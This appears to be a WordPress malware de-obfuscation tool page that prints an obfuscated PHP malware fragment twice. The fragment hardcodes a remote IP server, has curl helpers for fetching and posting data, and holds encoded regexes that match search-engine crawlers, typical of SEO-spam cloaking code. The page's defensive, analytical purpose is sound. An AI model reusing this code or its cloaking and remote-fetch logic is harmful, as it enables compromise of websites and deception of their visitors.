De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php @header('Content-Type:text/html;charset=utf-8'); error_reporting(0); $OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; global $O; $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,"; $oOooOO = 'z0823_7'; $oOooOOoO = "http://198.204.238.74/z0823_7/"; function func1($arg1) { $var1 = curl_init(); curl_setopt($var1, CURLOPT_URL, $arg1); curl_setopt($var1, CURLOPT_RETURNTRANSFER, 1); curl_setopt($var1, CURLOPT_CONNECTTIMEOUT, 5); $ret = curl_exec($var1); curl_close($var1); return $ret; } function func2($arg1, $arg2 = array()) { global $O; $arg1 = str_replace(' ', '+', $arg1); $var1 = curl_init(); curl_setopt($var1, CURLOPT_URL, "{$arg1}"); curl_setopt($var1, CURLOPT_RETURNTRANSFER, 1); curl_setopt($var1, CURLOPT_HEADER, 0); curl_setopt($var1, CURLOPT_TIMEOUT, 10); curl_setopt($var1, CURLOPT_POST, 1); curl_setopt($var1, CURLOPT_POSTFIELDS, http_build_query($arg2)); $ret = curl_exec($var1); $err = curl_errno($var1); curl_close($var1); if (0 !== $err) { return false; } return $ret; } function func3($arg1) { global $O; $ret = false; $var1 = $O[14] . $O[8] . $O[8] . $O[14] . $O[18] . $O[2] . $O[23] . $O[8] . $O[4] . $O[90] . $O[14] . $O[8] . $O[8] . $O[14] . $O[18] . $O[2] . $O[90] . $O[5] . $O[10] . $O[15] . $O[8] . $O[8] . $O[90] . $O[23] . $O[7] . $O[24] . $O[14] . $O[90] . $O[10] . $O[8] . $O[18]; if ($arg1 != '') { if (preg_match("/({$var1})/si", $arg1)) { $ret = true; } } return $ret; } function func4($arg1) { global $O; $ret = false; $var1 = $O[14] . $O[8] . $O[8] . $O[14] . $O[18] . $O[2] . $O[59] . $O[21] . $O[8] . $O[59] . $O[16] . $O[9] . $O[90] . $O[5] . $O[10] . $O[15] . $O[8] . $O[8] . $O[59] . $O[21] . $O[8] . $O[59] . $O[16] . $O[9] . $O[90] . $O[14] . $O[8] . $O[8] . $O[14] . $O[18] . $O[2] . $O[59] . $O[21] . $O[8] . $O[25]; if ($arg1 != '' && preg_match("/({$var1})/si", $arg1)) { $ret = true; } return $ret; } ?>
<?php @header('Content-Type:text/html;charset=utf-8'); error_reporting(0); $OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; global $O; $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,"; $oOooOO = 'z0823_7'; $oOooOOoO = "http://198.204.238.74/z0823_7/"; function func1($arg1) { $var1 = curl_init(); curl_setopt($var1, CURLOPT_URL, $arg1); curl_setopt($var1, CURLOPT_RETURNTRANSFER, 1); curl_setopt($var1, CURLOPT_CONNECTTIMEOUT, 5); $ret = curl_exec($var1); curl_close($var1); return $ret; } function func2($arg1, $arg2 = array()) { global $O; $arg1 = str_replace(' ', '+', $arg1); $var1 = curl_init(); curl_setopt($var1, CURLOPT_URL, "{$arg1}"); curl_setopt($var1, CURLOPT_RETURNTRANSFER, 1); curl_setopt($var1, CURLOPT_HEADER, 0); curl_setopt($var1, CURLOPT_TIMEOUT, 10); curl_setopt($var1, CURLOPT_POST, 1); curl_setopt($var1, CURLOPT_POSTFIELDS, http_build_query($arg2)); $ret = curl_exec($var1); $err = curl_errno($var1); curl_close($var1); if (0 !== $err) { return false; } return $ret; } function func3($arg1) { global $O; $ret = false; $var1 = $O[14] . $O[8] . $O[8] . $O[14] . $O[18] . $O[2] . $O[23] . $O[8] . $O[4] . $O[90] . $O[14] . $O[8] . $O[8] . $O[14] . $O[18] . $O[2] . $O[90] . $O[5] . $O[10] . $O[15] . $O[8] . $O[8] . $O[90] . $O[23] . $O[7] . $O[24] . $O[14] . $O[90] . $O[10] . $O[8] . $O[18]; if ($arg1 != '') { if (preg_match("/({$var1})/si", $arg1)) { $ret = true; } } return $ret; } function func4($arg1) { global $O; $ret = false; $var1 = $O[14] . $O[8] . $O[8] . $O[14] . $O[18] . $O[2] . $O[59] . $O[21] . $O[8] . $O[59] . $O[16] . $O[9] . $O[90] . $O[5] . $O[10] . $O[15] . $O[8] . $O[8] . $O[59] . $O[21] . $O[8] . $O[59] . $O[16] . $O[9] . $O[90] . $O[14] . $O[8] . $O[8] . $O[14] . $O[18] . $O[2] . $O[59] . $O[21] . $O[8] . $O[25]; if ($arg1 != '' && preg_match("/({$var1})/si", $arg1)) { $ret = true; } return $ret; }
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.